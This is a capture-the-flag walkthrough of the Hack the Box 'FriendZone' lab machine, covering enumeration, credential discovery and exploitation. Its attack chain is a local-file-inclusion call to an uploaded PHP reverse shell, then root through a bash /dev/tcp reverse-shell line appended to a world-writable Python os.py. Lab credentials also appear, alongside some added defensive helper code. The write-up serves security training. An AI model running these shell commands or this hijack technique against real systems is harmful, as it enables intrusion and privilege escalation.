
Hack the Box - FriendZone

Hi there, this is the FriendZone machine walkthrough. An easy box, but so much fun.

Information

  • OS: Linux
  • IP: 10.10.10.123
  • Difficulty: Easy

Enumeration

Let's start with nmap xD.

$ nmap -sV -sC -A -Pn 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST
Nmap scan report for 10.10.10.123
Host is up (0.30s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
53/tcp  open  domain
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-06-06T17:14:52+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  -0s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds

The services that interested me most were:

  1. An FTP server was running, but it required a username and password.
  2. HTTP and HTTPS were running too xD
  3. This server was also used as a DNS server for the domain friendzone.red.
  4. A Samba file server was running and also allowed the guest user xD

Check HTTP and HTTPS port

For http://10.10.10.123 I found this

FriendZone web

But https://10.10.10.123 showed an Apache Not Found page.

However, there was an email address on the page, info@friendzoneportal.red. From the NMAP scan result and this email address, I thought the server had 2 domains, friendzone.red and friendzoneportal.red. So, I added these to my /etc/hosts file.

10.10.10.123 friendzone.red
10.10.10.123 friendzoneportal.red

Now open the website again using these domain names. The HTTP pages showed the same result, but I tried HTTPS and found these.

https://friendzone.red

FriendZone web

https://friendzoneportal.red

FriendZone web

The page source didn't have any interesting hints; there were only those 2 GIF images.

Check for sub domains

I used the dig command to request a zone transfer (because port 53 was open) and see whether any subdomains existed, and yeahh, they did xD

$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A	127.0.0.1
administrator1.friendzone.red. 604800 IN A	127.0.0.1
hr.friendzone.red.	604800	IN	A	127.0.0.1
uploads.friendzone.red.	604800	IN	A	127.0.0.1
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:01 KST 2019
;; XFR size: 8 records (messages 1, bytes 261)
$ dig axfr friendzoneportal.red @10.10.10.123
; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A	127.0.0.1
admin.friendzoneportal.red. 604800 IN	A	127.0.0.1
files.friendzoneportal.red. 604800 IN	A	127.0.0.1
imports.friendzoneportal.red. 604800 IN	A	127.0.0.1
vpn.friendzoneportal.red. 604800 IN	A	127.0.0.1
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 511 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:25 KST 2019
;; XFR size: 9 records (messages 1, bytes 281)

I added the names from the A records to my /etc/hosts file.

10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
10.10.10.123 admin.friendzoneportal.red
10.10.10.123 files.friendzoneportal.red
10.10.10.123 imports.friendzoneportal.red
10.10.10.123 vpn.friendzoneportal.red

Access to web page via domain name

There were 2 admin domains:

  • administrator1.friendzone.red

administrator1.friendzone.red

  • admin.friendzoneportal.red

admin.friendzoneportal.red

I tried some SQL injection, but it didn't work, and the page admin.friendzoneportal.red showed the message "Admin page is not developed yet !!! check for another one". So I thought only the first domain would work.

Let's check the SMB server

The NMAP scan showed that SMB was running and allowed the guest user, so I tried to connect to the file server as guest.

SMB Login

SMB folder

There were 3 shares, but after trying to mount them, only 2 could be mounted.

SMB Development Folder

Lol, I found some PHP shell files here. That was quite a hint left by other players xD. I checked the folder permissions and it was read/write.

And in the general share I found a creds.txt file, which held the admin credentials.

SMB general folder

creds for the admin THING:
admin:WORKWORKHhallelujah@#

Check admin webpage again xD

I used this credential to log in to https://administrator1.friendzone.red and it showed this message.

Login Done ! visit /dashboard.php

So, now let's check https://administrator1.friendzone.red/dashboard.php

FriendZone admin

The beginner PHP developer of this page told us to add some params to the URL to show the image. Haha, let's try...

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

FriendZone admin

I looked around and found nothing. I could only change the image name between a.jpg and b.jpg. But what was that pagename param???

Since I had found some PHP shell files inside the shared folder Development, I thought the pagename param must be a Local File Inclusion. So we had to know the real path of the Development share on the server.

NMAP with the smb-enum-shares script

I googled smb enum and found the smb-enum-shares script for NMAP. So, I ran nmap again.

$ nmap --script smb-enum-shares -p139 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.49s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds

I could see that the Development share was stored at /etc/Development (Samba reports the path in Windows form, C:\etc\Development).
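As an added example (not part of the original walkthrough), a small parser for the smb-enum-shares block above that pulls out each share's Unix path and flags the ones a guest session can write to; the sample text is a constructed, trimmed copy of the scan output.

```python
import re

# Constructed sample: a trimmed copy of the smb-enum-shares block above
# (IPC$ and the Type/Users/Comment fields left out to keep it short).
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   Development:
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|   Files:
|     Path: C:\etc\hole
|     Anonymous access: <none>
|   general:
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|   print$:
|     Path: C:\var\lib\samba\printers
|_    Anonymous access: <none>
"""

# Samba reports Unix share paths in Windows form (C:\etc\Development):
# drop the drive letter and flip the separators to get the server-side path.
def samba_unix_path(win_path: str) -> str:
    return re.sub(r"^[A-Za-z]:", "", win_path).replace("\\", "/")

def parse_smb_enum_shares(output: str) -> dict:
    """{share: {field: value}} from nmap's indentation: names 3 spaces in ending with ':', fields 5 in."""
    shares, current = {}, None
    for line in output.splitlines():
        if not line.startswith("|"):
            continue
        body = line[1:]
        if body.startswith("_"):        # "|_" marks the last line of a script block
            body = " " + body[1:]
        indent = len(body) - len(body.lstrip(" "))
        text = body.strip()
        if indent == 3 and text.endswith(":"):
            current = text[:-1]
            shares[current] = {}
        elif indent == 5 and current and ": " in text:
            key, value = text.split(": ", 1)
            shares[current][key] = value
    return shares

def anonymous_writable_shares(shares: dict) -> dict:
    """Share name -> Unix path for every share a guest can write to; on a server you own this should be empty."""
    return {name: samba_unix_path(f.get("Path", ""))
            for name, f in shares.items()
            if "WRITE" in f.get("Anonymous access", "")}
```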

Get access to the machine

Now I created a reverse shell file named a.php and copied it to that share. I started my netcat listener for the reverse shell and tried to execute it through the pagename param on the admin website.

My a.php file should be at /etc/Development/a.php. Using the Local File Inclusion, I opened it as

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/a

I didn't add the .php extension because the sample value pagename=timestamp had none, so the script must append .php itself.
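To make that .php suffix behaviour concrete, here is the include logic reconstructed in Python beside a fixed version. This is an added example, not the box's real dashboard.php; the web root /var/www/admin and the one-entry allowlist are assumptions.

```python
import os

# Assumed web root of the admin vhost (the walkthrough never shows where
# dashboard.php lives, so this is a placeholder).
WEB_ROOT = "/var/www/admin"

# Pages dashboard.php legitimately serves; the walkthrough only shows
# pagename=timestamp, so the allowlist is assumed to be just that.
ALLOWED_PAGES = {"timestamp"}


def vulnerable_resolve(pagename: str) -> str:
    """What include($_GET['pagename'] . ".php") boils down to: the request value
    becomes the path and only ".php" is appended, so any readable .php file on
    the box (such as one written into the Development share) gets included."""
    # os.path.join discards WEB_ROOT when pagename is absolute, the same effect
    # PHP's include has with an absolute path; normpath collapses "../" steps.
    return os.path.normpath(os.path.join(WEB_ROOT, pagename + ".php"))


def hardened_resolve(pagename: str) -> str:
    """Fixed version: an allowlist of page names, plus a containment check as
    defence in depth in case the allowlist is ever widened carelessly."""
    if pagename not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % pagename)
    target = os.path.normpath(os.path.join(WEB_ROOT, pagename + ".php"))
    # On a live server resolve with os.path.realpath as well, so a symlink
    # cannot point the final path back outside the web root.
    if os.path.commonpath([WEB_ROOT, target]) != WEB_ROOT:
        raise ValueError("page resolves outside the web root")
    return target


if __name__ == "__main__":
    for value in ("timestamp", "/etc/Development/a", "../../../etc/Development/a"):
        print("vulnerable:", value, "->", vulnerable_resolve(value))
        try:
            print("hardened:  ", value, "->", hardened_resolve(value))
        except ValueError as exc:
            print("hardened:  ", value, "-> rejected (%s)" % exc)
```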

And on my reverse shell listener:

$ netcat -lvnp 1234
Connection from 10.10.10.123:54510
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:37:35 up 34 min,  0 users,  load average: 2.85, 4.84, 5.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
friend
$ cd /home/friend
$ ls
user.txt
$ cat user.txt
a9****************************11
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@FriendZone:/home/friend$ 

In /var/www/ I found the file mysql_data.conf, which contained the database user and password.

www-data@FriendZone:/home/friend$ cd /var/www
www-data@FriendZone:/var/www$ ls
admin	    friendzoneportal	   html		    uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

So, I tried to ssh to the machine as friend using that password.

$ ssh friend@10.10.10.123
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Jun  7 10:34:26 2019 from 10.10.12.75
friend@FriendZone:~$ 

And I got a fully interactive TTY shell.

Root

After getting a shell on the box, I uploaded pspy64 and executed the binary. This is what I noticed.

pspy

The script reporter.py was run by root. I kept tracking that process and saw that the script was run by cron every few minutes. This is what was inside reporter.py. Most lines of code were commented out, but there was an import os line, which imports the library from Python 2.7.

friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

I went to the library directory, /usr/lib/python2.7. The interesting thing was that the python2.7 directory had full permissions for everyone (world-writable).

friend@FriendZone:/usr/lib$ ls -la | grep python2
drwxrwxrwx 27 root root  16384 Jun 26 14:27 python2.7

So did the file os.py.

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root     root      25876 Jun 26 14:32 os.py

Since reporter.py was always run by root and imports the os module, I appended some code to the end of os.py to execute a reverse shell.

system("bash -c 'bash -i &>/dev/tcp/10.10.12.78/1234 0<&1'")
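The root cause here is a world-writable module on root's import path. As an added example (not from the original post), a check a sysadmin could run to find such entries; the demo() scenario is constructed in a temp directory so it runs anywhere.

```python
import os
import stat
import sys
import tempfile


def world_writable(path: str) -> bool:
    """True when 'other' may write to path, the state of /usr/lib/python2.7/os.py on the box."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_module_dirs(dirs) -> list:
    """(path, reason) for every import location a non-root user could tamper with.
    A writable directory is reported on its own: a new file dropped there can
    shadow a standard module even when the existing files are locked down."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        if world_writable(d):
            findings.append((d, "directory is world-writable"))
        for name in sorted(os.listdir(d)):
            full = os.path.join(d, name)
            if name.endswith(".py") and os.path.isfile(full) and world_writable(full):
                findings.append((full, "module file is world-writable"))
    return findings


def demo() -> list:
    """Constructed scenario in a temp dir: directory 0777 and os.py 0777 (as on
    the box) next to a correctly protected 0644 module."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o777)
    for name, mode in (("os.py", 0o777), ("stat.py", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("# placeholder module, constructed for the demo\n")
        os.chmod(path, mode)
    return audit_module_dirs([root])


if __name__ == "__main__":
    # Real check: walk the running interpreter's own import path
    findings = audit_module_dirs(sys.path)
    for path, reason in findings:
        print(path, "-", reason)
    print("%d finding(s)" % len(findings))
```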

I also started a netcat listener for this reverse shell and waited for the cron job to execute the script.

And I got a root shell.

$ nc -lvnp 1234
Connection from 10.10.10.123:54546
bash: cannot set terminal process group (3435): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# ls  
certs
root.txt
root@FriendZone:~# cat root.txt
b0****************************c7
root@FriendZone:~# 

Rooted, and I hope you enjoyed this xD
